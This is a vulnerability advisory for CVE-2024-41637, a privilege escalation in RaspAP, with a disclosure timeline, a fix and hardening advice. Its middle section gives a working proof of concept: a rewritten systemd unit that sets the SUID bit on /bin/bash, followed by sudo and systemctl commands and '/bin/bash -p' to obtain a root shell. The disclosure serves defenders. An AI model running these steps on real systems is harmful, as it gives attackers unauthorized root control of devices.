[Cyware] CVE-2024-41637

Summary: A critical local privilege escalation vulnerability (CVE-2024-41637) has been identified in RaspAP, an open-source project for managing wireless access points on Raspberry Pi, allowing attackers to gain root access through improper permissions. The issue arises from the www-data user having write access to the service configuration file and sudo privileges, enabling arbitrary code execution with root privileges.

Threat Actor: Unknown | unknown
Victim: RaspAP | RaspAP

Key Point :

  • Vulnerability allows www-data user to modify the restapi.service file and execute commands as root.
  • Exploitation involves editing the service configuration to set the SUID bit on /bin/bash.
  • To mitigate, permissions on the service file should be restricted to prevent unauthorized modifications.
  • Best practices include implementing the principle of least privilege and regularly auditing sudo access.
  • Monitoring and logging are essential for detecting unauthorized changes and potential exploitation attempts.
Title: RaspAP Local Privilege Escalation
Risk: 9.9 Critical CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Versions Affected: Before Versions 3.1.5
Identifier: CVE-2024-41637
Authors: Aaron Haymore

Summary

RaspAP is an open-source project that simplifies the process of configuring and managing a wireless access point on a Raspberry Pi through a web interface. It is designed to transform a Raspberry Pi into a wireless hotspot or router. This tool is particularly popular in educational settings, IoT applications, and among homelab enthusiasts.

A local privilege escalation vulnerability has been identified in RaspAP. The www-data user has write access to the restapi.service file and also possesses sudo privileges to execute several critical commands without a password. This combination of permissions allows an attacker to modify the service to execute arbitrary code with root privileges, escalating their access from www-data to root.

Proof of Concept (PoC) for Exploiting the Vulnerability

To demonstrate how this vulnerability can be exploited, follow these steps to gain root access by modifying and restarting a service with sudo privileges:

Edit the Service Configuration: Gain access as the www-data user and edit the restapi.service file located at /lib/systemd/system/restapi.service. Replace its contents with the following configuration:

[Unit]
Description=Set SUID bit on /bin/bash
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c 'echo "Service started. Use systemctl to stop the service to set the SUID bit on /bin/bash."'
ExecStop=/bin/bash -c 'chmod u+s /bin/bash'
Restart=always
RestartSec=1

[Install]
WantedBy=multi-user.target

This configuration will set the SUID bit on /bin/bash when the service stops, allowing the shell to run with root privileges.

Reboot the Machine: Run the following command to reboot the machine and reload the daemon:
sudo /sbin/reboot

Start the Modified Service: Once the machine has rebooted, start the modified restapi.service by running:
sudo /bin/systemctl start restapi.service

Stop the Service: To set the SUID bit, stop the service with the following command:
sudo /bin/systemctl stop restapi.service

Gain Root Access: Finally, execute the following command to get a root shell:
/bin/bash -p

By following these steps, an attacker can exploit the vulnerability to escalate privileges and gain root access. This demonstrates the critical nature of the issue and the importance of securing service configurations and restricting sudo access.

FIX

To fix this issue, change the permissions on /lib/systemd/system/restapi.service to disallow www-data from modifying it.

Report Timeline

07-16-2024: Vulnerability discovered and reported to security@raspap.com.
07-18-2024: No response from security@raspap.com, follow up email sent asking for acknowledgment.
07-23-2024: No response from security@raspap.com, follow up email sent asking for acknowledgment.
07-26-2024: No response from security@raspap.com, follow up email sent asking for acknowledgment and notificaion of public disclosure.
07-27-2024: Public Disclosure

Conclusion

This vulnerability in RaspAP highlights the critical importance of correctly configuring access controls and user privileges within a system. Allowing a low-privilege user like www-data to modify service files and use sudo without proper restrictions can lead to severe security breaches, including privilege escalation and arbitrary code execution.

To prevent such vulnerabilities, it is essential to adhere to the following best practices for access control:

  • Implement the Principle of Least Privilege: Ensure that users only have the minimal level of access necessary to perform their duties. Restrict write permissions to service files to only those who absolutely need it.
  • Audit and Restrict sudo Access: Regularly review sudoers configurations to ensure that only trusted users have the ability to execute commands with elevated privileges. Avoid broad NOPASSWD configurations that can be exploited.
  • Secure Service Configurations: Ensure that critical service configurations and scripts are protected from unauthorized modifications. Use appropriate file permissions and ownership settings.
  • Monitoring and Logging: Implement comprehensive logging and monitoring to detect and alert on unauthorized changes or suspicious activities. Regularly review logs to catch potential exploitation attempts early.

By focusing on correct access controls and ensuring that permissions are appropriately configured, organizations can significantly reduce the risk of such vulnerabilities and maintain a more secure environment. This case underscores the importance of diligently managing user privileges and access to critical system components.

Source: https://blog.0xzon.dev/2024-07-27-CVE-2024-41637